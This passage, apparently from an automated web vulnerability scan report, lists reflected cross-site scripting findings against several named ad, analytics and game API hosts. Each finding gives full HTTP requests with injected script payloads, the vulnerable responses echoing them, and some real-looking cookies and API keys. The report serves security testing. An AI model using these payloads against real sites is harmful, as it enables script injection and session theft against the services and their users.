<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?Z=1x1&fb233"-alert(1)-"19d71a463a=1&s=2377409&_salt=3393856248";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...
2.7. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 595b1"><script>alert(1)</script>d3f03646bfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2377409&595b1"><script>alert(1)</script>d3f03646bfa=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:49 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:49:49 GMT
Pragma: no-cache
Content-Length: 4715
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ads.bluelithium.com/imageclick?595b1"><script>alert(1)</script>d3f03646bfa=1&Z=1x1&s=2377409&_salt=4008406020&t=2" target="_parent">
...[SNIP]...
2.8. http://adserving.cpxinteractive.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b423'-alert(1)-'25f6b002c06 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x05b423'-alert(1)-'25f6b002c06&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:48:56 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:56 GMT
Content-Length: 503

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=0x05b423'-alert(1)-'25f6b002c06&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBU
...[SNIP]...
2.9. http://adserving.cpxinteractive.com/st [pop_frequency parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the pop_frequency request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8de21'-alert(1)-'54cf1ba13ce was submitted in the pop_frequency parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=864008de21'-alert(1)-'54cf1ba13ce HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:49:18 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:18 GMT
Content-Length: 494

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=864008de21'-alert(1)-'54cf1ba13ce&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1620509%26banned_pop_types%3D2
...[SNIP]...
2.10. http://adserving.cpxinteractive.com/st [pop_times parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the pop_times request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da557'-alert(1)-'2b810b2be8e was submitted in the pop_times parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1da557'-alert(1)-'2b810b2be8e&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:49:14 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:14 GMT
Content-Length: 494

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1da557'-alert(1)-'2b810b2be8e&pop_freq_duration=86400&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D162050
...[SNIP]...
2.11. http://adserving.cpxinteractive.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f594'-alert(1)-'282e6498410 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=16205091f594'-alert(1)-'282e6498410&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:49:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:00 GMT
Content-Length: 494

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=16205091f594'-alert(1)-'282e6498410&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type
...[SNIP]...
2.12. http://api.bizographics.com/v1/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 93296<script>alert(1)</script>12a9537ccd was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1c93296<script>alert(1)</script>12a9537ccd&callback_url=http%3A%2F%2Fdts1.raasnet.com%2Fdts%2Fbizo%2Fin HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=ZDDH4OisxVKDXDYTFVciiWVtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KWxZzbyauJoDaj5XcunNcMDa7Re6IGD4lIvNliiTsQ3d0Ad6xyMUDLG4HisD7PuAiisYPXoxU8ZPy3Exo4N71w46SKb0NrpeKvDEEAHRkUP4DRqbp7KchoR8KSjE5cmLaumWulAJAT7BX2HrsROqwTV75bDCe4W2moTMPW6Nj5X3Td87pcdJDAlOFM4SE3xQyPhdqGoP8BGM4wnZd9rxFhue7CnPt7OKf3925MlVpUzFqnOU3CJ2wtdwM8iiVTP0Et7iiJPsiim5vOPNb1QJipLd4ekU1f7MrQxrTtB1Wxn268X1nipp3OMCDTtSipisN9MTZe7RE8f54Pmyis0b2kXPJlCH2Dc5iivgsHGiiGKQLeexC7h8LZyqRAWM4Y0T5rNbhrhiprNS9j4rsWfOeTjexKjZ6ZI4Zomlgie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 12 Sep 2011 13:06:25 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e339375522360161b3cf7c4fe7e;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 91
Connection: keep-alive

Unknown API key: (eff06988d5814684997ff16c58dc2e1c93296<script>alert(1)</script>12a9537ccd)
2.13. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload a110d<script>alert(1)</script>497df2cabeb was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1c&callback_url=a110d<script>alert(1)</script>497df2cabeb HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=ZDDH4OisxVKDXDYTFVciiWVtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KWxZzbyauJoDaj5XcunNcMDa7Re6IGD4lIvNliiTsQ3d0Ad6xyMUDLG4HisD7PuAiisYPXoxU8ZPy3Exo4N71w46SKb0NrpeKvDEEAHRkUP4DRqbp7KchoR8KSjE5cmLaumWulAJAT7BX2HrsROqwTV75bDCe4W2moTMPW6Nj5X3Td87pcdJDAlOFM4SE3xQyPhdqGoP8BGM4wnZd9rxFhue7CnPt7OKf3925MlVpUzFqnOU3CJ2wtdwM8iiVTP0Et7iiJPsiim5vOPNb1QJipLd4ekU1f7MrQxrTtB1Wxn268X1nipp3OMCDTtSipisN9MTZe7RE8f54Pmyis0b2kXPJlCH2Dc5iivgsHGiiGKQLeexC7h8LZyqRAWM4Y0T5rNbhrhiprNS9j4rsWfOeTjexKjZ6ZI4Zomlgie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 12 Sep 2011 13:06:27 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e339375522360161b3cf7c4fe7e;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: a110d<script>alert(1)</script>497df2cabeb
2.14. http://api.chartbeat.com/toppages/ [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.chartbeat.com
Path:   /toppages/

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload be0db<script>alert(1)</script>f34e1e517d7 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toppages/?host=observer.com&jsonp=chartbeat_top_pages.cback2821356be0db<script>alert(1)</script>f34e1e517d7&apikey=e58ef8b1512d5591696ca4b8badf20b9&limit=20 HTTP/1.1
Host: api.chartbeat.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 12 Sep 2011 12:48:15 GMT
Content-Type: text/javascript
Connection: close
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 3926

chartbeat_top_pages.cback2821356be0db<script>alert(1)</script>f34e1e517d7([{"i": "MT: 0", "path": "\/", "visitors": 38}, {"i": "Morning Links: Is Paul Krugman OK? | The New York Observer", "path": "\/2011\/09\/morning-links-is-paul-krugman-ok\/", "visitors": 10}, {"i": "Cre
...[SNIP]...
2.15. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 32eb5<script>alert(1)</script>e1d9a8838e6 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=232eb5<script>alert(1)</script>e1d9a8838e6&c2=6035470&c3=&c4=/&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 26 Sep 2011 12:50:03 GMT
Date: Mon, 12 Sep 2011 12:50:03 GMT
Content-Length: 1240
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"232eb5<script>alert(1)</script>e1d9a8838e6", c2:"6035470", c3:"", c4:"/", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});


2.16. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8de00<script>alert(1)</script>5287633e421 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E?verbosity=9&callback=jQuery16204978716284967959_13158497317468de00<script>alert(1)</script>5287633e421&_=1315849740224 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:27 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 634
Connection: keep-alive

jQuery16204978716284967959_13158497317468de00<script>alert(1)</script>5287633e421({
"content": "",
"headers": {
"Content-Type": [
"text/html; charset=utf-8"
],
"Vary": [
"Authorization"
],
"Location": [

...[SNIP]...
2.17. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/status [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/status

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 54cb5<script>alert(1)</script>2964cc901df was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/status?verbosity=9&callback=jQuery16204978716284967959_131584973174554cb5<script>alert(1)</script>2964cc901df&_=1315849736810 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:10 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 435
Connection: keep-alive

jQuery16204978716284967959_131584973174554cb5<script>alert(1)</script>2964cc901df({
"content": "29",
"headers": {
"Content-Type": [
"text/html; charset=utf-8"
],
"Vary": [
"Authorization"
],
"BDM-Reason-Phrase"
...[SNIP]...
2.18. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c26c7<script>alert(1)</script>39da3c5bada was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E?verbosity=9&callback=jQuery162045605130144394934_1315850661325c26c7<script>alert(1)</script>39da3c5bada&_=1315850662055 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 13:04:46 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 6204
Connection: keep-alive

jQuery162045605130144394934_1315850661325c26c7<script>alert(1)</script>39da3c5bada({
"content": [
{
"read_only": 0,
"modified_timestamp": 1315831726,
"resource_name": "end_user",
"award_summaries": [],
"best_gue
...[SNIP]...
2.19. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E/named_level_collection [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E/named_level_collection

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6b724<script>alert(1)</script>5bfe554e92d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E/named_level_collection?attribute_friendly_id=bdm-quest&max_records=15&completion=complete&order_by=-created&verbosity=9&callback=jQuery16204978716284967959_13158497317486b724<script>alert(1)</script>5bfe554e92d&_=1315849741737 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:42 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 353
Connection: keep-alive

jQuery16204978716284967959_13158497317486b724<script>alert(1)</script>5bfe554e92d({
"content": [
[],
{}
],
"headers": {
"Content-Type": [
"application/json; charset=utf-8"
],
"Vary": [
"Authorization"

...[SNIP]...
2.20. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_level_collection [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_level_collection

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c780e<script>alert(1)</script>f8f059caaeb was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_level_collection?attribute_friendly_id=bdm-quest-active&max_records=1&order_by=-relative_weight&verbosity=9&callback=jQuery16204978716284967959_1315849731747c780e<script>alert(1)</script>f8f059caaeb&_=1315849741736 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
